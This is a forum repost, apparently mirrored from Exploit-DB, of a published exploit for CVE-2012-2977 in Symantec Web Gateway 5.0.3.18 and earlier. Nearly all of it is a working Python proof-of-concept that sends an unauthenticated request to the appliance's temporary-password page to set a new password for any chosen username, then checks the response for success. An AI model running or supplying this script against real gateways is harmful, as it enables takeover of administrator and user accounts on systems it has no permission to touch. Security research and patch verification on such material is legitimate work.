- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 20707
- Проверка EDB
-
- Пройдено
- Автор
- KC57
- Тип уязвимости
- WEBAPPS
- Платформа
- LINUX
- CVE
- cve-2012-2977
- Дата публикации
- 2012-08-21
Код:
#!/usr/bin/python
import urllib
import urllib2
import re
import sys
print "[*] ###########################################################"
print "[*] Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change"
print "[*] @_Kc57"
print "[*] ###########################################################\n"
if (len(sys.argv) != 4):
print "Usage: poc.py <RHOST> <username> <newpassword>"
exit(0)
ip = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
url = "https://%s/spywall/temppassword.php" % (ip)
opts = {
'target':'executive_summary.php',
'USERNAME':username,
'password':password,
'password2':password,
'Save':'Save'
}
print "[*] Sending request to server..."
data = urllib.urlencode(opts)
request = urllib2.Request(url, data)
response = urllib2.urlopen(request)
match = re.search('Your new password has been saved', response.read())
if(match):
print "[*] Password for %s changed to %s" %(username,password)
else:
print "[*] Password change failed!"
- Источник
- www.exploit-db.com